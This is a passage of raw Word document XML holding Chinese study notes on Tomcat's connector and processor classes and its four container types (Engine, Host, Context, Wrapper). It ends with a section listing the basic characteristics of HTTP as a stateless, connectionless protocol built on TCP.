          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(5)常量类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>核心模块: serveletProcessor和StaticResourceProcessor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HttpConnector负责等待请求(创建一个ServerSocket等待连接请求),为每个请求创建一个HttpProcessor实例(线程),调用其process方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HttpProcessor负责接收传入的请求套接字，创建HttpRequest和HttpResponse对象并填充它的变量,解析Http请求的第一行和请求头，填充HttpHeader对象；将HttpRequest和HttpResponse对象传给serveletProcessor和StaticResourceProcessor的process方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>第五章 servlet容器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> 需要实现org.apache.catalina.Container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的实例。在Tomcat中，共有4种类型容器，分为Engine、Host、Context、Wrapper。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Engine:表示整个Catalina Servlet引擎；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Host：表示一个或者多个Context容器的虚拟主机；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Context表示一个Web应用程序。一个Context可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>多个Wrapper；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Wrapper：表示一个独立的servlet;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="0087687D" w:rsidRDefault="00D866AF" w:rsidP="0087687D">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E3D14" w:rsidRPr="008E3D14" w:rsidRDefault="008E3D14" w:rsidP="001F0186">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="245" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001F0186" w:rsidRPr="00F41A4C" w:rsidRDefault="001F0186" w:rsidP="00B74803">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008770B5" w:rsidRPr="00F41A4C" w:rsidRDefault="009D7663" w:rsidP="008770B5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.10</w:t>
      </w:r>
      <w:r w:rsidR="008E0342" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008770B5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP</w:t>
      </w:r>
      <w:r w:rsidR="008770B5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>协议与</w:t>
      </w:r>
      <w:r w:rsidR="008770B5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="008770B5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE3DB1" w:rsidRDefault="00941586" w:rsidP="00AE3DB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>应用层协议，基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>协议，无状态连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941586" w:rsidRPr="00F41A4C" w:rsidRDefault="00AE3DB1" w:rsidP="00AE3DB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>支持客户</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器模式。</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>简单快速：客户向服务器请求服务时，只需传送请求方法和路径。请求方法常用的有</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HEAD</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。每种方法规定了客户与服务器联系的类型不同。由于</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议简单，使得</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器的程序规模小，因而通信速度很快。</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>灵活：</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>允许传输任意类型的数据对象。正在传输的类型由</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>加以标记。</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>无连接：无连接的含义是限制每次连接只处理一个请求。服务器处理完客户的请求，并收到客户的应答后，即断开连接。采用这种方式可以节省传输时间。</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>无状态：</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00BE260B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议是无状态协议。无状态是指协议对于事务处理没有记忆能力。缺少状态意味着如果后续处理需要前面的信息，则它必须重传，这样可能导致每次连接传送的数据量增大。另一方面，在服务器不需要先前信息时它的应答就较快。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941586" w:rsidRPr="00F41A4C" w:rsidRDefault="000A6629" w:rsidP="00941586">
      <w:pPr>
        <w:rPr>
